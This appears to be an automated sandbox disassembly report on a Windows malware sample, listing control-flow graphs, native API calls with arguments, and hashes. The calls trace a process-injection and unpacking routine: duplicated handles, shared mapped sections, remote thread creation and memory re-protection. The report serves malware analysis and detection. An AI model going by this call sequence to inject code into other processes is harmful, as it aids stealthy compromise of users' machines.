                                      • API ID: Console$CommFile$LengthReadStringType$AliasAliasesAtomAttributesBinaryBoundsBuildCompareConfigDefaultDisconnectEventExchangeExesFindFormatInterlockedModeModuleMoveNameNamedOutputPathPipePulseRectSearchStateTimeVersion
                                      • String ID: k`$}$
                                      • API String ID: 4155975733-956986773
                                      • Opcode ID: ec1e4d95d6be3dfcdf53541fe43f6e0baff54e05d6a8dcf86ef6a62a0be8a3cf
                                      • Instruction ID: eba57e92584bb82605fa89a7ec6af6020b8b03ca4a43cd0270bfcb4f130e7ef6
                                      • Opcode Fuzzy Hash: ec1e4d95d6be3dfcdf53541fe43f6e0baff54e05d6a8dcf86ef6a62a0be8a3cf
                                      • Instruction Fuzzy Hash: 27A11471841A24EBC720DB65DC58ADF7B78EF89351F4140AAF50AA7150CB384A81CBED

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 153 401514-401533 155 401524-40152f 153->155 156 401536-40156e call 401193 153->156 155->156 165 401570 156->165 166 401573-401578 156->166 165->166 168 401898-4018a0 166->168 169 40157e-40158f 166->169 168->166 172 4018a5-4018b7 168->172 173 401595-4015be 169->173 174 401896 169->174 179 4018c5 172->179 180 4018bc-4018e3 call 401193 172->180 173->174 183 4015c4-4015db NtDuplicateObject 173->183 174->172 179->180 183->174 185 4015e1-401605 NtCreateSection 183->185 187 401661-401687 NtCreateSection 185->187 188 401607-401628 NtMapViewOfSection 185->188 187->174 190 40168d-401691 187->190 188->187 189 40162a-401646 NtMapViewOfSection 188->189 189->187 192 401648-40165e 189->192 190->174 193 401697-4016b8 NtMapViewOfSection 190->193 192->187 193->174 195 4016be-4016da NtMapViewOfSection 193->195 195->174 198 4016e0 call 4016e5 195->198
                                      APIs
                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd
                                      Similarity
                                      • API ID: Section$View$Create$DuplicateObject
                                      • String ID:
                                      • API String ID: 1546783058-0
                                      • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                      • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                      • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                      • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 200 4014fe-401503 201 401531-40156e call 401193 200->201 202 401506-401511 200->202 212 401570 201->212 213 401573-401578 201->213 212->213 215 401898-4018a0 213->215 216 40157e-40158f 213->216 215->213 219 4018a5-4018b7 215->219 220 401595-4015be 216->220 221 401896 216->221 226 4018c5 219->226 227 4018bc-4018e3 call 401193 219->227 220->221 230 4015c4-4015db NtDuplicateObject 220->230 221->219 226->227 230->221 232 4015e1-401605 NtCreateSection 230->232 234 401661-401687 NtCreateSection 232->234 235 401607-401628 NtMapViewOfSection 232->235 234->221 237 40168d-401691 234->237 235->234 236 40162a-401646 NtMapViewOfSection 235->236 236->234 239 401648-40165e 236->239 237->221 240 401697-4016b8 NtMapViewOfSection 237->240 239->234 240->221 242 4016be-4016da NtMapViewOfSection 240->242 242->221 245 4016e0 call 4016e5 242->245
                                      APIs
                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd
                                      Similarity
                                      • API ID: Section$CreateDuplicateObjectView
                                      • String ID:
                                      • API String ID: 1652636561-0
                                      • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                      • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                      • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                      • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 247 401542-40156e call 401193 256 401570 247->256 257 401573-401578 247->257 256->257 259 401898-4018a0 257->259 260 40157e-40158f 257->260 259->257 263 4018a5-4018b7 259->263 264 401595-4015be 260->264 265 401896 260->265 270 4018c5 263->270 271 4018bc-4018e3 call 401193 263->271 264->265 274 4015c4-4015db NtDuplicateObject 264->274 265->263 270->271 274->265 276 4015e1-401605 NtCreateSection 274->276 278 401661-401687 NtCreateSection 276->278 279 401607-401628 NtMapViewOfSection 276->279 278->265 281 40168d-401691 278->281 279->278 280 40162a-401646 NtMapViewOfSection 279->280 280->278 283 401648-40165e 280->283 281->265 284 401697-4016b8 NtMapViewOfSection 281->284 283->278 284->265 286 4016be-4016da NtMapViewOfSection 284->286 286->265 289 4016e0 call 4016e5 286->289
                                      APIs
                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd
                                      Similarity
                                      • API ID: Section$View$Create$DuplicateObject
                                      • String ID:
                                      • API String ID: 1546783058-0
                                      • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                      • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                      • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                      • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 291 401549-40156e call 401193 295 401570 291->295 296 401573-401578 291->296 295->296 298 401898-4018a0 296->298 299 40157e-40158f 296->299 298->296 302 4018a5-4018b7 298->302 303 401595-4015be 299->303 304 401896 299->304 309 4018c5 302->309 310 4018bc-4018e3 call 401193 302->310 303->304 313 4015c4-4015db NtDuplicateObject 303->313 304->302 309->310 313->304 315 4015e1-401605 NtCreateSection 313->315 317 401661-401687 NtCreateSection 315->317 318 401607-401628 NtMapViewOfSection 315->318 317->304 320 40168d-401691 317->320 318->317 319 40162a-401646 NtMapViewOfSection 318->319 319->317 322 401648-40165e 319->322 320->304 323 401697-4016b8 NtMapViewOfSection 320->323 322->317 323->304 325 4016be-4016da NtMapViewOfSection 323->325 325->304 328 4016e0 call 4016e5 325->328
                                      APIs
                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd
                                      Similarity
                                      • API ID: Section$View$Create$DuplicateObject
                                      • String ID:
                                      • API String ID: 1546783058-0
                                      • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                      • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                      • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                      • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 330 401557 331 40155b-40156e call 401193 330->331 332 40154f-401554 330->332 335 401570 331->335 336 401573-401578 331->336 332->331 335->336 338 401898-4018a0 336->338 339 40157e-40158f 336->339 338->336 342 4018a5-4018b7 338->342 343 401595-4015be 339->343 344 401896 339->344 349 4018c5 342->349 350 4018bc-4018e3 call 401193 342->350 343->344 353 4015c4-4015db NtDuplicateObject 343->353 344->342 349->350 353->344 355 4015e1-401605 NtCreateSection 353->355 357 401661-401687 NtCreateSection 355->357 358 401607-401628 NtMapViewOfSection 355->358 357->344 360 40168d-401691 357->360 358->357 359 40162a-401646 NtMapViewOfSection 358->359 359->357 362 401648-40165e 359->362 360->344 363 401697-4016b8 NtMapViewOfSection 360->363 362->357 363->344 365 4016be-4016da NtMapViewOfSection 363->365 365->344 368 4016e0 call 4016e5 365->368
                                      APIs
                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd
                                      Similarity
                                      • API ID: Section$View$Create$DuplicateObject
                                      • String ID:
                                      • API String ID: 1546783058-0
                                      • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                      • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                      • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                      • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 371 402f97-402fbb 372 402fc1-402fd9 371->372 373 4030ee-4030f3 371->373 372->373 374 402fdf-402ff0 372->374 375 402ff2-402ffb 374->375 376 403000-40300e 375->376 376->376 377 403010-403017 376->377 378 403039-403040 377->378 379 403019-403038 377->379 380 403062-403065 378->380 381 403042-403061 378->381 379->378 382 403067-40306a 380->382 383 40306e 380->383 381->380 382->383 384 40306c 382->384 383->375 385 403070-403075 383->385 384->385 385->373 386 403077-40307a 385->386 386->373 387 40307c-4030eb RtlCreateUserThread NtTerminateProcess 386->387 387->373
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd
                                      Similarity
                                      • API ID: CreateProcessTerminateThreadUser
                                      • String ID:
                                      • API String ID: 1921587553-0
                                      • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                      • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                      • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                      • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 388 2ca0a22-2ca0a3b 389 2ca0a3d-2ca0a3f 388->389 390 2ca0a41 389->390 391 2ca0a46-2ca0a52 CreateToolhelp32Snapshot 389->391 390->391 392 2ca0a62-2ca0a6f Module32First 391->392 393 2ca0a54-2ca0a5a 391->393 394 2ca0a78-2ca0a80 392->394 395 2ca0a71-2ca0a72 call 2ca06e1 392->395 393->392 398 2ca0a5c-2ca0a60 393->398 399 2ca0a77 395->399 398->389 398->392 399->394
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02CA0A4A
                                      • Module32First.KERNEL32(00000000,00000224), ref: 02CA0A6A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1827444929.0000000002C9D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C9D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2c9d000_FyDBXJE74v.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 3833638111-0
                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                      • Instruction ID: 4a97a2a2baba50396ccc3009b50f5bfee862a036fec9055f64a5ae3cabcb87ee
                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                      • Instruction Fuzzy Hash: A5F0F6355407126BD7203BF8A88CBAEB6FCAF882ADF100128E647D10C0DB70ED058B61

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 68 2bc003c-2bc0047 69 2bc004c-2bc0263 call 2bc0a3f call 2bc0e0f call 2bc0d90 VirtualAlloc 68->69 70 2bc0049 68->70 85 2bc028b-2bc0292 69->85 86 2bc0265-2bc0289 call 2bc0a69 69->86 70->69 88 2bc02a1-2bc02b0 85->88 90 2bc02ce-2bc03c2 VirtualProtect call 2bc0cce call 2bc0ce7 86->90 88->90 91 2bc02b2-2bc02cc 88->91 97 2bc03d1-2bc03e0 90->97 91->88 98 2bc0439-2bc04b8 VirtualFree 97->98 99 2bc03e2-2bc0437 call 2bc0ce7 97->99 101 2bc04be-2bc04cd 98->101 102 2bc05f4-2bc05fe 98->102 99->97 104 2bc04d3-2bc04dd 101->104 105 2bc077f-2bc0789 102->105 106 2bc0604-2bc060d 102->106 104->102 108 2bc04e3-2bc0505 104->108 109 2bc078b-2bc07a3 105->109 110 2bc07a6-2bc07b0 105->110 106->105 111 2bc0613-2bc0637 106->111 120 2bc0517-2bc0520 108->120 121 2bc0507-2bc0515 108->121 109->110 112 2bc086e-2bc08be LoadLibraryA 110->112 113 2bc07b6-2bc07cb 110->113 114 2bc063e-2bc0648 111->114 119 2bc08c7-2bc08f9 112->119 116 2bc07d2-2bc07d5 113->116 114->105 117 2bc064e-2bc065a 114->117 122 2bc0824-2bc0833 116->122 123 2bc07d7-2bc07e0 116->123 117->105 118 2bc0660-2bc066a 117->118 124 2bc067a-2bc0689 118->124 126 2bc08fb-2bc0901 119->126 127 2bc0902-2bc091d 119->127 128 2bc0526-2bc0547 120->128 121->128 125 2bc0839-2bc083c 122->125 129 2bc07e4-2bc0822 123->129 130 2bc07e2 123->130 131 2bc068f-2bc06b2 124->131 132 2bc0750-2bc077a 124->132 125->112 133 2bc083e-2bc0847 125->133 126->127 134 2bc054d-2bc0550 128->134 129->116 130->122 137 2bc06ef-2bc06fc 131->137 138 2bc06b4-2bc06ed 131->138 132->114 139 2bc0849 133->139 140 2bc084b-2bc086c 133->140 135 2bc0556-2bc056b 134->135 136 2bc05e0-2bc05ef 134->136 142 2bc056d 135->142 143 2bc056f-2bc057a 135->143 136->104 144 2bc06fe-2bc0748 137->144 145 2bc074b 137->145 138->137 139->112 140->125 142->136 146 2bc057c-2bc0599 143->146 147 2bc059b-2bc05bb 143->147 144->145 145->124 152 2bc05bd-2bc05db 146->152 147->152 152->134
                                      APIs
                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02BC024D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1827149563.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2bc0000_FyDBXJE74v.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID: cess$kernel32.dll
                                      • API String ID: 4275171209-1230238691
                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                      • Instruction ID: a97384a6708762faa592521019cf2917f48b713c582d72c5f24114e11d221d69
                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                      • Instruction Fuzzy Hash: D9526974A01229DFDB64DF58C984BACBBB1BF09304F1484E9E94DAB351DB30AA95CF14

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 370 415bd0-415d10 GetModuleHandleW GetProcAddress VirtualProtect
                                      APIs
                                      • GetModuleHandleW.KERNEL32(02B19CE8), ref: 00415CAF
                                      • GetProcAddress.KERNEL32(00000000,0041BCD0), ref: 00415CEC
                                      • VirtualProtect.KERNELBASE(02B19B2C,02B19CE4,00000040,?), ref: 00415D0B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1825971161.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_40b000_FyDBXJE74v.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProcProtectVirtual
                                      • String ID:
                                      • API String ID: 2099061454-3916222277
                                      • Opcode ID: fce140ef23c65c88e38e2773b9808fd7a4a7f181c7d9ac89fa5d9b1ed533d8e0
                                      • Instruction ID: bc4e3c19969ebc9a4e99d85580481d2fdd23850efab95505bf2beb8bb76e5d7b
                                      • Opcode Fuzzy Hash: fce140ef23c65c88e38e2773b9808fd7a4a7f181c7d9ac89fa5d9b1ed533d8e0
                                      • Instruction Fuzzy Hash: DF3155149487C0CAE301CB78F8547823FA2EB25744F44847CD589873A5EFBA1524D7EE

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 401 2bc0e0f-2bc0e24 SetErrorMode * 2 402 2bc0e2b-2bc0e2c 401->402 403 2bc0e26 401->403 403->402
                                      APIs
                                      • SetErrorMode.KERNELBASE(00000400,?,?,02BC0223,?,?), ref: 02BC0E19
                                      • SetErrorMode.KERNELBASE(00000000,?,?,02BC0223,?,?), ref: 02BC0E1E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1827149563.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2bc0000_FyDBXJE74v.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                      • Instruction ID: 77c97d7024dbc5d55cac5be4f831ea749ad4cceaf4e4613560d8921a742c1e29
                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                      • Instruction Fuzzy Hash: 10D01231545129B7D7003A94DC09BCD7B1CDF09B67F108451FB0DD9080C770954046E5

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 404 4018e6-40194b call 401193 Sleep call 40141f 418 40195a-4019a5 call 401193 404->418 419 40194d-401955 call 401514 404->419 419->418
                                      APIs
                                      • Sleep.KERNELBASE(00001388), ref: 00401936
                                        • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd
                                      Similarity
                                      • API ID: Section$CreateDuplicateObjectSleepView
                                      • String ID:
                                      • API String ID: 1885482327-0
                                      • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                      • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                      • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                      • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 433 401915-401918 434 4018c6-4018c7 433->434 435 40191a-40194b call 401193 Sleep call 40141f 433->435 436 4018d7 434->436 437 4018ce-4018e3 call 401193 434->437 447 40195a-4019a5 call 401193 435->447 448 40194d-401955 call 401514 435->448 436->437 448->447
                                      APIs
                                      • Sleep.KERNELBASE(00001388), ref: 00401936
                                        • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd
                                      Similarity
                                      • API ID: Section$CreateDuplicateObjectSleepView
                                      • String ID:
                                      • API String ID: 1885482327-0
                                      • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                      • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                      • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                      • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 462 4018f1-40194b call 401193 Sleep call 40141f 472 40195a-4019a5 call 401193 462->472 473 40194d-401955 call 401514 462->473 473->472
                                      APIs
                                      • Sleep.KERNELBASE(00001388), ref: 00401936
                                        • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd
                                      Similarity
                                      • API ID: Section$CreateDuplicateObjectSleepView
                                      • String ID:
                                      • API String ID: 1885482327-0
                                      • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                      • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                      • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                      • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 487 401912-40194b call 401193 Sleep call 40141f 498 40195a-4019a5 call 401193 487->498 499 40194d-401955 call 401514 487->499 499->498
                                      APIs
                                      • Sleep.KERNELBASE(00001388), ref: 00401936
                                        • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd
                                      Similarity
                                      • API ID: Section$CreateDuplicateObjectSleepView
                                      • String ID:
                                      • API String ID: 1885482327-0
                                      • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                      • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                      • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                      • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                      APIs
                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02CA0732
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1827444929.0000000002C9D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C9D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2c9d000_FyDBXJE74v.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                      • Instruction ID: 71fa39d9060702261d6bba4fe7cfb5c2bb62d14aa5838603c04f981b621a25b4
                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                      • Instruction Fuzzy Hash: 82113F79A00208EFDB01DF98C995E9CBBF5AF08350F058094F9489B361D371EA50DF90
                                      APIs
